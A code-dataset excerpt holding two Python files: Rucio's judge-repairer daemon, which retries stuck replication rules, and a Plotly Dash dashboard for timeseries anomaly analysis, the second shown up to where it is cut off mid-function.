source stringlengths 3 86 | python stringlengths 75 1.04M |
|---|---|
repairer.py | # -*- coding: utf-8 -*-
# Copyright 2013-2021 CERN
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# - Martin Barisits <martin.barisits@cern.ch>, 2013-2021
# - Vincent Garonne <vincent.garonne@cern.ch>, 2014-2018
# - Mario Lassnig <mario.lassnig@cern.ch>, 2014-2020
# - Hannes Hansen <hannes.jakob.hansen@cern.ch>, 2018-2019
# - Brandon White <bjwhite@fnal.gov>, 2019
# - Thomas Beermann <thomas.beermann@cern.ch>, 2020-2021
# - Benedikt Ziemons <benedikt.ziemons@cern.ch>, 2020
"""
Judge-Repairer is a daemon to repair stuck replication rules.
"""
import logging
import os
import socket
import threading
import time
import traceback
from copy import deepcopy
from datetime import datetime, timedelta
from random import randint
from re import match
from sqlalchemy.exc import DatabaseError
import rucio.db.sqla.util
from rucio.common import exception
from rucio.common.exception import DatabaseException
from rucio.common.logging import setup_logging
from rucio.core.heartbeat import live, die, sanity_check
from rucio.core.monitor import record_counter
from rucio.core.rule import repair_rule, get_stuck_rules
graceful_stop = threading.Event()
def rule_repairer(once=False):
"""
Main loop to check for STUCK replication rules
"""
hostname = socket.gethostname()
pid = os.getpid()
current_thread = threading.current_thread()
paused_rules = {} # {rule_id: datetime}
# Make an initial heartbeat so that all judge-repairers have the correct worker number on the next try
executable = 'judge-repairer'
live(executable=executable, hostname=hostname, pid=pid, thread=current_thread, older_than=60 * 30)
graceful_stop.wait(1)
while not graceful_stop.is_set():
try:
# heartbeat
heartbeat = live(executable=executable, hostname=hostname, pid=pid, thread=current_thread, older_than=60 * 30)
start = time.time()
# Refresh paused rules
iter_paused_rules = deepcopy(paused_rules)
for key in iter_paused_rules:
if datetime.utcnow() > paused_rules[key]:
del paused_rules[key]
# Select a bunch of rules for this worker to repair
rules = get_stuck_rules(total_workers=heartbeat['nr_threads'],
worker_number=heartbeat['assign_thread'],
delta=-1 if once else 1800,
limit=100,
blocked_rules=[key for key in paused_rules])
logging.debug('rule_repairer[%s/%s] index query time %f fetch size is %d' % (heartbeat['assign_thread'], heartbeat['nr_threads'], time.time() - start, len(rules)))
if not rules and not once:
logging.debug('rule_repairer[%s/%s] did not get any work (paused_rules=%s)' % (heartbeat['assign_thread'], heartbeat['nr_threads'], str(len(paused_rules))))
graceful_stop.wait(60)
else:
for rule_id in rules:
rule_id = rule_id[0]
logging.info('rule_repairer[%s/%s]: Repairing rule %s' % (heartbeat['assign_thread'], heartbeat['nr_threads'], rule_id))
if graceful_stop.is_set():
break
try:
start = time.time()
repair_rule(rule_id=rule_id)
logging.debug('rule_repairer[%s/%s]: repairing of %s took %f' % (heartbeat['assign_thread'], heartbeat['nr_threads'], rule_id, time.time() - start))
except (DatabaseException, DatabaseError) as e:
if match('.*ORA-00054.*', str(e.args[0])):
paused_rules[rule_id] = datetime.utcnow() + timedelta(seconds=randint(600, 2400))
logging.warning('rule_repairer[%s/%s]: Locks detected for %s' % (heartbeat['assign_thread'], heartbeat['nr_threads'], rule_id))
record_counter('rule.judge.exceptions.LocksDetected')
elif match('.*QueuePool.*', str(e.args[0])):
logging.warning(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
elif match('.*ORA-03135.*', str(e.args[0])):
logging.warning(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
else:
logging.error(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
except (DatabaseException, DatabaseError) as e:
if match('.*QueuePool.*', str(e.args[0])):
logging.warning(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
elif match('.*ORA-03135.*', str(e.args[0])):
logging.warning(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
else:
logging.critical(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
except Exception as e:
logging.critical(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
if once:
break
die(executable=executable, hostname=hostname, pid=pid, thread=current_thread)
def stop(signum=None, frame=None):
"""
Graceful exit.
"""
graceful_stop.set()
def run(once=False, threads=1):
"""
Starts up the Judge-Repairer threads.
"""
setup_logging()
if rucio.db.sqla.util.is_old_db():
raise exception.DatabaseException('Database was not updated, daemon won\'t start')
executable = 'judge-repairer'
hostname = socket.gethostname()
sanity_check(executable=executable, hostname=hostname)
if once:
rule_repairer(once)
else:
logging.info('Repairer starting %s threads' % str(threads))
threads = [threading.Thread(target=rule_repairer, kwargs={'once': once}) for i in range(0, threads)]
[t.start() for t in threads]
# Interruptible joins require a timeout.
while threads[0].is_alive():
[t.join(timeout=3.14) for t in threads]
|
app.py | """============================================================================
Python Dashboard produced to monitor timeseries data with high periodicity and search for anomlous regions in the data.
Dashboard largely developed based on tutorial located at https://realpython.com/python-dash/ and inspired by https://dash-gallery.plotly.host/dash-manufacture-spc-dashboard/.
Contents:
- Imports and Set Up
- Local Parameters
- Hyperparameter Loading
-Read In Markdown
- Functions used in callbacks
- Tabs, Graphs and Banners
- Individual tab layouts
Tab 1: Raw variables
Tab 2: Fourier Anaylsis
Tab 3: Alpha Anaylsis
Tab 4: BOCPD
Tab 5: PCA
- Bootstrap Style sheet and run
- Layout
- Callbacks
- Modals
- Server time
- Tabs
- Callbacks Tab 1:
- Callbacks Tab 2:
- Callbacks Tab 3:
- Callbacks Tab 4:
- Callbacks Tab 5:
- Cache
- Reset Folders data
- argv
Author: Joseph Walker j.j.walker@durham.ac.uk
============================================================================"""
################################################################################################################
# Imports and Set Up
################################################################################################################
#Required Dash Libraries
#Initalization
import dash
#Interactive components
import dash_core_components as dcc
#HTML tags
import dash_html_components as html
#Bootstrap components cols and rows
import dash_bootstrap_components as dbc
#Callback functions
from dash.dependencies import Output, Input, State
#Pandas for data import and management
import pandas as pd
import numpy as np
import scipy
#For moving data around as child
import json
#Command lines
import sys, getopt
import os
import time
#For manipulating datetime format
from datetime import datetime
from datetime import timedelta
#Import python codes for each anaylsis
from codes import DatManipulation as DatM
from codes import Fourier
from codes import BOCPD
from codes import PCA
from codes import Misc
from codes import CalcStats
#Graph code
from codes import DashPlots
from codes import Graphing
from multiprocessing import Process
#Default Parameters
import Vars
#######################
# Local Parameters
#######################
defaulttab='tab-1'
#Timing for periodic refreshes
dt_small = 1
dt_mid = 5
dt_big = 5
#######################
# Hyperparameter Loading
#######################
#General Dashsettings
SearchHeight = "60px"
FigHeightPX = 400
DefaultFeature = Vars.DefaultFeature
DefaultErrSize = Vars.DefaultErrSize
DefaultDataType = Vars.DefaultDataType
DefaultRescale = Vars.DefaultRescale
DefaultMetric = Vars.DefaultMetric
#General Window
WindowUnit = Vars.WindowUnit
WindowN = Vars.WindowN
#Alpha Hyperparameters
Alpha_MinFreq = Vars.Alpha_MinFreq
Fourier.Alpha_MinFreq = Alpha_MinFreq
#Set DefaultParams
BOCPD_tol = Vars.BOCPD_tol
BOCPD_haz = Vars.BOCPD_haz
BOCPD_MaxSeqLength = Vars.BOCPD_MaxSeqLength
BOCPD_errsScale = Vars.BOCPD_errsScale
BOCPD.BOCPD_tol = BOCPD_tol
BOCPD.BOCPD_MaxSeqLength = BOCPD_MaxSeqLength
BOCPD.BOCPD_haz = BOCPD_haz
#PCA Hyperparameters
PCA_FittedParams = Vars.PCA_FittedParams
PCA_WindowUnit = WindowUnit
PCA_WindowN = WindowN
#Rolling window
PCA.Rolling_WindowUnit = Vars.Rolling_WindowUnit
PCA.Rolling_Window = Vars.Rolling_Window
DatM.FileSuffix = Vars.FileSuffix
Graphing.BOCPD_errsScale = Vars.BOCPD_errsScale
SaveFigs = Vars.SaveFigs
SaveCache = Vars.SaveCache
#######################
# Read In Markdown
#######################
text_markdown = "\n \t"
with open('assets'+os.sep+'LoadInfo.md') as this_file:
for a in this_file.read():
if "\n" in a:
text_markdown += "\n \t"
else:
text_markdown += a
################################################################################################################
# Functions used in callbacks
################################################################################################################
def update_dropdown_files(DataDirectory):
'''
Update options for dropdown listing available files,
Parameters:
DataDirectory (str): directory containing files
Returns:
OptionsDict (dcc.options): dropdown options
value (dcc.value): value of dropdown
'''
Files = DatM.GlobDirectory(DataDirectory)
if len(Files) != 0:
return [{'label':"Variable: %s" % (name), 'value':name} for name in Files], Files[0]
else:
return [{'label':"Variable: %s" % (name), 'value':name} for name in []], None
def DateSlider(jsonified_data):
'''
Return the data slider for a given data set with datetime index,
Parameters:
jsonified_data (JSON): jsonified data with datatime index
Returns:
Min (float): Min value on slider
Max (float): Max value on slider
value (list[float]): [Initial Start, Initial End]
marks (dict): dict of marks locations
'''
if jsonified_data not in [0,"0", None, "None"]:
daterange = pd.read_json(jsonified_data, orient='split').index
Min = Misc.unixTimeMillis(daterange.min())
Max = Misc.unixTimeMillis(daterange.max())
value = [Misc.unixTimeMillis(daterange.min()),Misc.unixTimeMillis(daterange.max())]
marks = Misc.getMarksDates(daterange.min(),daterange.max(),daterange)
return Min, Max, value , marks
else:
Min = 0
Max = 10
value = [0,10]
marks = {}
return Min, Max, value , marks
def LoadDataAfterDropdowns(DataDirectory, Data_i_Name, inter=False):
'''
Load and jsonify data to move through callbacks,
Parameters:
DataDirectory (str): directory containing files
Data_i_Name (str): File name
inter (bool): T/F If to run linear interpolation on missing datapoints
Returns:
json (JSON): Jsonified data
'''
if Data_i_Name not in [None, "None"]:
data = DatM.LoadData(DataDirectory, Data_i_Name, inter)
return data.to_json(date_format='iso', orient='split')
else:
return 0
def toggle_modal(n1, n2, is_open):
'''
Toggle info modal displays
Parameters:
n1 (bool): Is open clicked
n2 (bool): Is close clicked
is_open (bool): T/F is open or closed
Returns:
is_open (bool): T/F is open or closed
'''
if n1 or n2:
return not is_open
return is_open
def Intervals(RefreshRate, ID):
'''
Create Intervals object to fire periodically,
Parameters:
RefreshRate (float): Rate for fire in seconds,
ID (str): Reference name,
Returns:
Interval (dcc.interval): dcc.interval object
'''
return dcc.Interval(
id=ID,
#In milliseconds
interval=RefreshRate * 1000,
n_intervals=0,
)
def Spinner(ID):
'''
Return loading spinner object,
Parameters:
ID (str): Reference name,
Returns:
Div (html.Div): html.Div containing spinner object to display when loading
'''
return html.Div(
dbc.Spinner(
html.Div(id=ID),
size='lg',
fullscreen=True,
fullscreen_style={"background-color":None},
color="#68246D",
),
)
def build_Process(Tab):
'''
Returns progress bar and run all button,
Parameters:
Tab (str): Part of string defining referance ID
Returns:
Div (html.Div): html.Div object containing progress bar and run button
'''
return html.Div(
children = [
html.H3(children="Run all:", id=Tab+"Process-Header" ,className="Header-text"),
dbc.Row(
children=[
dbc.Col(
html.Div(),
width = 1,
className="Cols",
),
dbc.Col(
dbc.Button('Run All', id=Tab+'Process-Button', n_clicks=0, className="Button"),
width = 2,
className="Cols",
),
dbc.Col(
html.Div(),
width = 1,
className="Cols",
),
dbc.Col(
dbc.Progress("0\u0025", value=0, id=Tab+'Process-Progress', className="Progress", barClassName="ProgressBar"),
width = 7,
className="Cols",
),
dbc.Col(
html.Div(),
width = 1,
className="Cols",
),
],
),
],
id=Tab+"Process",
)
################################################################################################################
# Tabs, Graphs and Banners
################################################################################################################
def build_graph(ID, Size):
'''
Returns empty plotly graph placeholder
Parameters:
ID (str): ID referance for this graph
Size (int): Pixel sixt
Returns:
Div (html.Div): html.Div containing blank dcc.Graph object
'''
return html.Div(
dcc.Graph(
figure = DashPlots.EmptyFig(Size),
id=ID, config={"displayModeBar": False, "doubleClick":"reset"},
),
className="graphContainer",
)
def build_banner():
'''
Return banner html.Div element framing the dashboard
Parameters:
Returns:
Div (html.Div): html.Div object containing the banner build
'''
return html.Div(
id="banner",
className="banner",
children=[
html.Div(
id="banner-text",
children=[
html.H5("Timeseries Analysis Dashboard"),
html.H6("A frequency analysis toolbox"),
],
),
html.Div(
id="banner-Img",
children=[
html.A([html.Img(src="assets"+os.sep+"durham-university-2019.png")],href="https://www.dur.ac.uk/", target='_blank'),
html.A([html.Img(src="assets"+os.sep+"logo-plotly.svg")],href="https://plotly.com/dash/", target='_blank'),
],
),
],
)
def build_tabs():
'''
Return dcc.Tabs which define main appearance of the dashboard
Parameters:
Returns:
Div (html.Div): html.Div containing all Tabs and larger structure of dashboard
'''
return html.Div(
className="tabs",
children = [
dcc.Tabs(
id='tabs',
className="custom-tabs",
value=defaulttab,
children=[
dcc.Tab(label='Variables', value='tab-1', className="custom-tab", selected_className="custom-tab--selected"),
dcc.Tab(label='Fourier Analysis', value='tab-2', className="custom-tab", selected_className="custom-tab--selected"),
dcc.Tab(label='Alpha Analysis', value='tab-3', className="custom-tab", selected_className="custom-tab--selected"),
dcc.Tab(label='BOCPD', value='tab-4', className="custom-tab", selected_className="custom-tab--selected"),
dcc.Tab(label='PCA', value='tab-5', className="custom-tab", selected_className="custom-tab--selected"),
]
),
]
)
################################################################################################################
# Individual tab layouts
################################################################################################################
#######################
# Tab 1: Raw variables
#######################
def build_rawdatasummary(Parameters):
'''
Return the key stats summary to left of Rawgraph figure
Parameters:
Parameters (dict): dictionary of statistics over the highlighted region
Returns:
Div (html.Div): Formated left column containing data.
'''
if Parameters["Mean"] != "N/A":
t0 = Misc.unixToDatetime(Parameters["Start"])
t1 = Misc.unixToDatetime(Parameters["End"])
else:
t0 = "N/A"
t1 = "N/A"
ModalText = [
html.P(["An interactive plot showing the variables selected with the string search or dropdown menu. Place data in the data/Rawdata folder and \
the drop-down menus will automatically display available data. The radio select 'Rescaled' will mean center the plotted data and 'None' will \
plot in natural units. On the left section of the graph are readouts of key statistics of the highlighed region which can be adjusted using \
the slider. Up-to 6 features can be plotted at once."],className="Header-text"),
]
return html.Div(
children = [
dbc.Modal(
children = [
dbc.ModalHeader("Raw variables info"),
dbc.ModalBody(ModalText),
dbc.ModalFooter(
dbc.Button("Close", id="RawModal-Close", className="ModalButton")
),
],
size="lg",
scrollable=True,
id="RawModal",
),
html.H3(["Raw variables plot"],className="Header-text"),
html.P(["Highlighted region statistics;"],className="Header-text"),
html.P(["t",html.Sub("0")," = %s" % (t0)],className="Para-text"),
html.P(["t",html.Sub("1")," = %s" % (t1)],className="Para-text"),
html.P(["t",html.Sub("0"),"-t", html.Sub("1"),"=%s days" % (Parameters["Duration"])],className="Para-text"),
html.P(["\u0394t = %s %s" % (Parameters["Rate"], Parameters["RateUnit"])],className="Para-text"),
html.P(["The calculated statistics;"],className="Header-text"),
html.P(["\u00B5(x[t",html.Sub("0"),":t",html.Sub("1"),"]) = %s" % (Parameters["Mean"])],className="Para-text"),
html.P(["\u03C3(x[t",html.Sub("0"),":t",html.Sub("1"),"]) = %s" % (Parameters["STD"])],className="Para-text"),
html.P(["min(x[t",html.Sub("0"),":t",html.Sub("1"),"]) = %s" % (Parameters["Min"])],className="Para-text"),
html.P(["max(x[t",html.Sub("0"),":t",html.Sub("1"),"]) = %s" % (Parameters["Max"])],className="Para-text"),
dbc.Button(
html.Span( html.Img(src="assets"+os.sep+"info.png", className="ButtonImg")),
id="RawModal-Open", className="ButtonInfo"
),
],
className="graphContainer",
)
def build_tab1(DefaultFeature, DefaultErrSize, DefaultDataType, DefaultRescale):
'''
Return the tab element of the Raw graphs tab.
Parameters:
DefaultFeature (str): Default search string
DefaultErrSize (float): Error scaling factor
DefaultDataType (str): "Raw", "Alpha" or "BOCPD"
DefaultRescale (float): "Norm", Plot as raw, "Rescale", plot mean centered features
Returns:
Div (html.Div): Built Tab
'''
offset = 1
sizegraph = 8
TabName = "Raw"
return html.Div(
children=[
Spinner("Spinner-tab1-A"),
Spinner("Spinner-tab1-B"),
Spinner("Spinner-tab1-C"),
Spinner("Spinner-tab1-D"),
#Placeholders
html.Div(
style={'display': 'none'},
children = [
html.H1(
id=TabName+'Direct',
children="data"+os.sep+TabName+'Data',
),
html.H1(
id=TabName+'Data',
children="0",
),
html.H1(
id=TabName+'DataError',
children="0",
),
html.H1(
id=TabName+'DataSummary',
children=json.dumps(CalcStats.CalcStatsEmpty()),
),
]
),
dbc.Row(
children = [
#First column
dbc.Col(
html.Div(
children = [
build_rawdatasummary(CalcStats.CalcStatsEmpty())
],
id="RawTable",
),
width=12-sizegraph,
className = "Cols",
),
#Second column
dbc.Col(
children = [
dbc.Row(
children = [
dbc.Col(
children=[
dcc.Dropdown(
id=TabName+'ColName-dropdown',
multi=True,
placeholder="Select a variable",
style = {"overflow-y":"scroll", "height":SearchHeight},
),
],
width={"size":6, "offset": 0},
className = "Cols",
),
dbc.Col(
children=[
dcc.Input(
id=TabName+'StrSearch',
type="text",
value=DefaultFeature,
placeholder="String Search",
style={'width': "100px"},
),
],
width={"size":2, "offset": 0},
className = "Cols",
),
dbc.Col(
children=[
dcc.Input(
id=TabName+'SigNum',
type="number",
value=DefaultErrSize,
min=0,
placeholder="Error multiplier",
style={'width': "100px"},
),
],
width={"size":2, "offset": 0},
className = "Cols",
),
dbc.Col(
dcc.RadioItems(
id=TabName+'Normed',
options=[{'label': i+" ", 'value': i} for i in ['None','Rescaled']],
value=DefaultRescale,
),
width={"size":2, "offset": 0},
className = "Cols",
),
],
className = "Rows",
),
dbc.Row(
children = [
build_graph("RawGraph", FigHeightPX),
],
className = "Rows",
),
dbc.Row(
children = [
dbc.Col(
children=[
html.Div()
],
width={"size":1, "offset": 0},
className = "Cols",
),
dbc.Col(
children = [
dcc.RangeSlider(
id=TabName+'RangeSlider',
)
],
width={"size":10, "offset": 0},
style={"display": "inline-block", "width": "100%"},
),
dbc.Col(
children=[
html.Div()
],
width={"size":1, "offset": 0},
className = "Cols",
),
],
className = "Rows",
),
],
width=sizegraph,
className = "Cols",
)
]
)
]
)
#######################
# Tab 2: Fourier Anaylsis
#######################
def build_fourierdatasummary(Parameters, FourierStats):
'''
Return the key stats summary to left of figures
Parameters:
Parameters (dict): dictionary of statistics over the highlighted region about raw data
FourierStats (dict): dictionary of statistics over the highlighted region about Fourier fit
Returns:
Div (html.Div): Formated left column containing data.
'''
if Parameters["Mean"] != "N/A":
t0 = Misc.unixToDatetime(Parameters["Start"])
t1 = Misc.unixToDatetime(Parameters["End"])
else:
t0 = "N/A"
t1 = "N/A"
ModalText = [
html.P(["This demo tab demonstrates the fast Fourier transform that is preformed for the \u03B1 analysis. The slider allows adjustments to \
the window size and refits the transform over this region. The red line indicates the fitted power spectrum function of the form \
A",html.Sub("0"),"f",html.Sup("\u03B1")," This \u03B1 is value associated for this window. Details of the fit and window are shown on \
the left."],className="Header-text"),
]
return html.Div(
children = [
dbc.Modal(
children = [
dbc.ModalHeader("Fourier info"),
dbc.ModalBody(ModalText),
dbc.ModalFooter(
dbc.Button("Close", id="FourierModal-Close", className="ModalButton")
),
],
size="lg",
scrollable=True,
id="FourierModal",
),
html.H3(["Fourier anaylsis plots"],className="Header-text"),
html.P(["Highlighted region statistics;"],className="Header-text"),
html.P(["t",html.Sub("0")," = %s" % (t0)],className="Para-text"),
html.P(["t",html.Sub("1")," = %s" % (t1)],className="Para-text"),
html.P(["t",html.Sub("0"),"-t", html.Sub("1"),"=%s days" % (Parameters["Duration"])],className="Para-text"),
html.P(["\u0394t = %s %s" % (Parameters["Rate"],Parameters["RateUnit"])],className="Para-text"),
html.P(["Fit parameters;"],className="Header-text"),
html.P(["A",html.Sub("0"), "(x[t",html.Sub("0"),":t",html.Sub("1"),"]) = %s \u00B1 %s" % (FourierStats["A0"],FourierStats["A0Err"])],className="Para-text"),
html.P(["\u03B1(x[t",html.Sub("0"),":t",html.Sub("1"),"]) = %s \u00B1 %s" % (FourierStats["Alpha"],FourierStats["AlphaErr"])],className="Para-text"),
dbc.Button(
html.Span( html.Img(src="assets"+os.sep+"info.png", className="ButtonImg")),
id="FourierModal-Open", className="ButtonInfo"
),
],
className="graphContainer",
)
def build_tab2(DefaultFeature, DefaultErrSize, DefaultDataType, DefaultRescale):
'''
Return the tab element of the Fourier graphs tab.
Parameters:
DefaultFeature (str): Default search string
DefaultErrSize (float): Error scaling factor
DefaultDataType (str): "Raw", "Alpha" or "BOCPD"
DefaultRescale (float): "Norm", Plot as raw, "Rescale", plot mean centered features
Returns:
Div (html.Div): Built Tab
'''
offset = 1
sizegraph = 8
TabName = "Fourier"
return html.Div(
children=[
Spinner("Spinner-tab2-A"),
Spinner("Spinner-tab2-B"),
Spinner("Spinner-tab2-C"),
Spinner("Spinner-tab2-D"),
#Placeholders
html.Div(
style={'display': 'none'},
children = [
html.H1(
id='RawDirect',
children="data"+os.sep+"RawData",
),
html.H1(
id=TabName+'Data',
children="0",
),
html.H1(
id=TabName+'DataSummary',
children=json.dumps(CalcStats.CalcStatsEmpty()),
),
html.H1(
id=TabName+'FourierDataSummary',
children=json.dumps(CalcStats.CalcFourierStatsEmpty()),
),
]
),
dbc.Row(
children = [
#First column
dbc.Col(
html.Div(
children = [
build_fourierdatasummary(CalcStats.CalcStatsEmpty(),CalcStats.CalcFourierStatsEmpty())
],
id="FourierTable",
),
width=12-sizegraph,
className = "Cols",
),
#Second column
dbc.Col(
children = [
dbc.Row(
children = [
dbc.Col(
children=[
dcc.Dropdown(
id=TabName+'ColName-dropdown',
multi=False,
placeholder="Select a variable",
style = {"overflow-y":"scroll", "height":SearchHeight},
),
],
width={"size":6, "offset": 0},
className = "Cols",
),
dbc.Col(
children=[
dcc.Input(
id=TabName+'StrSearch',
type="text",
value=DefaultFeature,
placeholder="String Search",
style={'width': "100px"},
),
],
width={"size":2, "offset": 0},
className = "Cols",
),
dbc.Col(
children=[
dcc.Input(
id=TabName+'SigNum',
type="number",
value=DefaultErrSize,
min=0,
placeholder="Error multiplier",
style={'width': "100px"},
),
],
width={"size":2, "offset": 0},
className = "Cols",
),
dbc.Col(
dcc.RadioItems(
id=TabName+'LinLog',
options=[{'label': i+" ", 'value': i} for i in ['Linear', 'Log']],
value='Log',
labelStyle={'display': 'inline'}
),
width={"size":2, "offset": 0},
className = "Cols",
),
],
className = "Rows",
),
dbc.Row(
children = [
build_graph("FourierGraph", FigHeightPX/2),
],
className = "Rows",
),
dbc.Row(
children = [
build_graph("FourierRawGraph", FigHeightPX/2),
],
className = "Rows",
),
dbc.Row(
children = [
dbc.Col(
children=[
html.Div()
],
width={"size":1, "offset": 0},
className = "Cols",
),
dbc.Col(
children = [
dcc.RangeSlider(
id=TabName+'RangeSlider',
)
],
width={"size":10, "offset": 0},
style={"display": "inline-block", "width": "100%"},
),
dbc.Col(
children=[
html.Div()
],
width={"size":1, "offset": 0},
className = "Cols",
),
],
className = "Rows",
),
],
width=sizegraph,
className = "Cols",
)
]
)
]
)
#######################
# Tab 3: Alpha Anaylsis
#######################
def build_Alphasdatasummary(Parameters, AlphaParameters):
'''
Return the key stats summary to left of figures
Parameters:
Parameters (dict): dictionary of statistics over the highlighted region about raw data
AlphaParameters (dict): dictionary of statistics over the highlighted region about alpha fit
Returns:
Div (html.Div): Formated left column containing data.
'''
if Parameters["Mean"] != "N/A":
t0 = Misc.unixToDatetime(Parameters["Start"])
t1 = Misc.unixToDatetime(Parameters["End"])
else:
t0 = "N/A"
t1 = "N/A"
ModalText = [
html.P(["This tab displays and performs the \u03B1 anaylsis. Use the string search and dropdown menu to select a series then click run. \
The lower plot displays the orginal feature, the upper the \u03B1 series. Click on a data point in the top to display the fourier window below. \
Clicking run in the lower left corner will run the anaylsis for all files in data\RawData and save them in data\AlphaData. The progess bar \
updates while this is running."],className="Header-text"),
]
return html.Div(
children = [
dbc.Modal(
children = [
dbc.ModalHeader("Alpha anaylsis info"),
dbc.ModalBody(ModalText),
dbc.ModalFooter(
dbc.Button("Close", id="AlphasModal-Close", className="ModalButton")
),
],
size="lg",
scrollable=True,
id="AlphasModal",
),
html.P(["Highlighted region statistics;"],className="Header-text"),
html.P(["t",html.Sub("0")," = %s" % (t0)],className="Para-text"),
html.P(["t",html.Sub("1")," = %s" % (t1)],className="Para-text"),
html.H3(["Alpha window anaylsis plots"],className="Header-text"),
html.P(["Alpha statistics;"],className="Header-text"),
html.P(["\u00B5(x[t",html.Sub("0"),":t",html.Sub("1"),"]) = %s" % (AlphaParameters["Mean"])],className="Para-text"),
html.P(["\u03C3(x[t",html.Sub("0"),":t",html.Sub("1"),"]) = %s" % (AlphaParameters["STD"])],className="Para-text"),
html.P(["min(x[t",html.Sub("0"),":t",html.Sub("1"),"]) = %s" % (AlphaParameters["Min"])],className="Para-text"),
html.P(["max(x[t",html.Sub("0"),":t",html.Sub("1"),"]) = %s" % (AlphaParameters["Max"])],className="Para-text"),
dbc.Button(
html.Span( html.Img(src="assets"+os.sep+"info.png", className="ButtonImg")),
id="AlphasModal-Open", className="ButtonInfo"
),
],
id="AlphasTable",
)
def build_tab3(DefaultFeature, DefaultErrSize, DefaultDataType, DefaultRescale):
'''
Return the tab element of the Alpha graphs tab.
Parameters:
DefaultFeature (str): Default search string
DefaultErrSize (float): Error scaling factor
DefaultDataType (str): "Raw", "Alpha" or "BOCPD"
DefaultRescale (float): "Norm", Plot as raw, "Rescale", plot mean centered features
Returns:
Div (html.Div): Built Tab
'''
offset = 1
sizegraph = 8
TabName = "Alphas"
return html.Div(
children=[
Spinner("Spinner-tab3-A"),
Spinner("Spinner-tab3-B"),
Spinner("Spinner-tab3-C"),
Spinner("Spinner-tab3-D"),
#Placeholders
html.Div(
style={'display': 'none'},
children = [
html.H1(
id="RawDirect",
children='data'+os.sep+'RawData',
),
html.H1(
id="AlphasDirect",
children='data'+os.sep+'AlphaData',
),
html.H1(
id='AlphasRawData',
children="0",
),
html.H1(
id=TabName+'Data',
children="0",
),
html.H1(
id=TabName+'DataSummary',
children=json.dumps(CalcStats.CalcStatsEmpty()),
),
html.H1(
id=TabName+'AlphasDataSummary',
children=json.dumps(CalcStats.CalcAlphaStatsEmpty()),
),
]
),
dbc.Row(
children = [
#First column
dbc.Col(
children = [
dbc.Row(
build_Alphasdatasummary(CalcStats.CalcStatsEmpty(), CalcStats.CalcAlphaStatsEmpty()),
className="graphContainer",
),
dbc.Row(
build_Process("Alphas"),
className="graphContainer",
),
],
width=12-sizegraph,
className = "Cols",
),
#Second column
dbc.Col(
children = [
dbc.Row(
children = [
dbc.Col(
children=[
dcc.Dropdown(
id=TabName+'ColName-dropdown',
multi=False,
placeholder="Select a variable",
style = {"overflow-y":"scroll", "height":SearchHeight},
),
],
width={"size":6, "offset": 0},
className = "Cols",
),
dbc.Col(
children=[
dcc.Input(
id=TabName+'StrSearch',
type="text",
value=DefaultFeature,
placeholder="String Search",
style={'width': "100px"},
),
],
width={"size":2, "offset": 0},
className = "Cols",
),
dbc.Col(
children=[
dcc.Input(
id=TabName+'SigNum',
type="number",
value=DefaultErrSize,
min=0,
placeholder="Error multiplier",
style={'width': "100px"},
),
],
width={"size":2, "offset": 0},
className = "Cols",
),
dbc.Col(
children=[
dbc.Button(
id=TabName+'Run',
className="Button",
children="Run",
style={"width":"80px"},
),
],
width={"size":1, "offset": 0},
className = "Cols",
),
],
className = "Rows",
),
dbc.Row(
children = [
build_graph("AlphasGraph", FigHeightPX/2),
],
className = "Rows",
),
dbc.Row(
children = [
build_graph("AlphasRawGraph", FigHeightPX/2),
],
className = "Rows",
),
],
width=sizegraph,
className = "Cols",
)
], className= "Rows"
),
]
)
#######################
# Tab 4: BOCPD
#######################
def build_BOCPDdatasummary(Parameters, BOCPDStats):
'''
Return the key stats summary to left of figures
Parameters:
Parameters (dict): dictionary of statistics over the highlighted region about raw data
BOCPDStats (dict): dictionary of statistics over the highlighted region about BOCPD
Returns:
Div (html.Div): Formated left column containing data.
'''
if Parameters["Mean"] != "N/A":
t0 = Misc.unixToDatetime(Parameters["Start"])
t1 = Misc.unixToDatetime(Parameters["End"])
else:
t0 = "N/A"
t1 = "N/A"
ModalText = [
html.P(["Bayesian Online Change Point detection. A probabilistic analysis on a live sequence of data which returns a likely-hood that points belong to the previous sequence of points given a prior. Here we've assumed a Gaussian prior with an errors scaled up-to %s sigma. The colour map is scaled logarithmically, hovering over the graph will show the sequence length and likely-hood. The red line show's the most likely sequence length, clicking will highlight the lower plot to show the data contained in this sequence. Select the single feature using the dropdown menu and click run. Alternatively click run in the lower section to run on all files in data\RawData and files will save in data\BOCPDdata." % BOCPD_errsScale],className="Header-text"),
]
return html.Div(
children = [
dbc.Modal(
children = [
dbc.ModalHeader("BOCPD info"),
dbc.ModalBody(ModalText),
dbc.ModalFooter(
dbc.Button("Close", id="BOCPDModal-Close", className="ModalButton")
),
],
size="lg",
scrollable=True,
id="BOCPDModal",
),
html.H3(["BOCPD anaylsis plots"],className="Header-text"),
html.P(["Highlighted region statistics;"],className="Header-text"),
html.P(["t",html.Sub("0")," = %s" % (t0)],className="Para-text"),
html.P(["t",html.Sub("1")," = %s" % (t1)],className="Para-text"),
html.P(["t",html.Sub("0"),"-t", html.Sub("1"),"=%s days" % (Parameters["Duration"])],className="Para-text"),
html.P(["BOCPD overview"], className="Header-text"),
html.P(["max(l) = %s" % (BOCPDStats["MaxSeq"])],className="Para-text"),
html.P(["\u00B5(l) = %s" % (BOCPDStats["MeanSeq"])],className="Para-text"),
html.P(["N(l=0) = %s" % (BOCPDStats["NoZeros"])],className="Para-text"),
dbc.Button(
html.Span( html.Img(src="assets"+os.sep+"info.png", className="ButtonImg")),
id="BOCPDModal-Open", className="ButtonInfo"
),
],
id="BOCPDTable",
)
def build_tab4(DefaultFeature, DefaultErrSize, DefaultDataType, DefaultRescale):
'''
Return the tab element of the BOCPD graphs tab.
Parameters:
